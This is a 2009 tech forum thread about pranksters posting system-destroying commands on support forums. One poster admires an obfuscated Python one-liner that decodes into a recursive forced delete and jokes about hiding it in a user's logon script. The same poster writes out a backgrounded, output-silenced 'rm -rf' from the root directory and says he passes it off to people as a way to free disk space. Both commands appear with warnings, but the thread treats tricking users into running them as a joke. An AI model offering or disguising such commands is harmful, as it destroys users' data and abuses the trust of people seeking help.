Collapse
X
  • Filter
  • Time
  • Show
Clear All

• Trouble brewing on tech support forums

http://ubuntuforums.org/announcement.php?f=132

I couldn't help but utter an evil laugh when I read that. Oh the possibilities... it is potentially a very serious problem though.

That said, hats off to whoever thought up something as simple yet deadly as
    Code:
    python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
    In case anyone hasn't read the link, don't run that code!

And try to resist the temptation to put it in an annoying user's logon script...

Edit: *giggles*

Again, don't do that one either - and I'm going to stop posting ways to trash systems now
    Last edited by gforceindustries; 11th August 2009, 16:04.
    Gareth Howells

BSc (Hons), MBCS, MCP, MCDST, ICCE

Any advice is given in good faith and without warranty.

Please give reputation points if somebody has helped you.

"For by now I could have stretched out my hand and struck you and your people with a plague that would have wiped you off the Earth." (Exodus 9:15) - I could kill you with my thumb.

"Everything that lives and moves will be food for you." (Genesis 9:3) - For every animal you don't eat, I'm going to eat three.

Re: Trouble brewing on tech support forums

That's just mean. Although I've been guilty of telling some people in online games that alt-f4 enables hyper-framerate processing.
    Wesley David
    LinkedIn | Careers 2.0
    -------------------------------
    Microsoft Certifications: MCSE 2003 | MCSA:Messaging 2003 | MCITP:EA, SA, EST | MCTS: a'plenty | MCDST
    Vendor Neutral Certifications: CWNA
    Blog: www.TheNubbyAdmin.com || Twitter: @Nonapeptide || GTalk, Reader and Google+: [email protected] || Skype: Wesley.Nonapeptide
    Goofy kitten avatar photo from Troy Snow: flickr.com/photos/troysnow/

Comment

Re: Trouble brewing on tech support forums

Meh. I tend to tell people that the best way to free up hard drive space on their Linux box is with... *
      Code:
      nohup cd /; rm -rf * > /dev/null 2>&1 &
      But as we all know, before freeing up hard drive space you should always take a backup first - and what better backup device to use than the Non-Unwinding Longitudinal Length drive. Fast, efficient and you don't have to keep getting up to change tapes

* and if anybody chooses to run that, I accept absolutely no responsibility for your it frying your processor, insulting your mother or causing you to break out in a nasty rash - and no it doesn't install a Seamonkey beta . All I'll say is that it's amazing how long a system can run after you've deleted all the binaries and trashed the filesystem.
      Last edited by gforceindustries; 11th August 2009, 17:07.
      Gareth Howells

BSc (Hons), MBCS, MCP, MCDST, ICCE

Any advice is given in good faith and without warranty.

Please give reputation points if somebody has helped you.

"For by now I could have stretched out my hand and struck you and your people with a plague that would have wiped you off the Earth." (Exodus 9:15) - I could kill you with my thumb.

"Everything that lives and moves will be food for you." (Genesis 9:3) - For every animal you don't eat, I'm going to eat three.

Comment

Working...
      X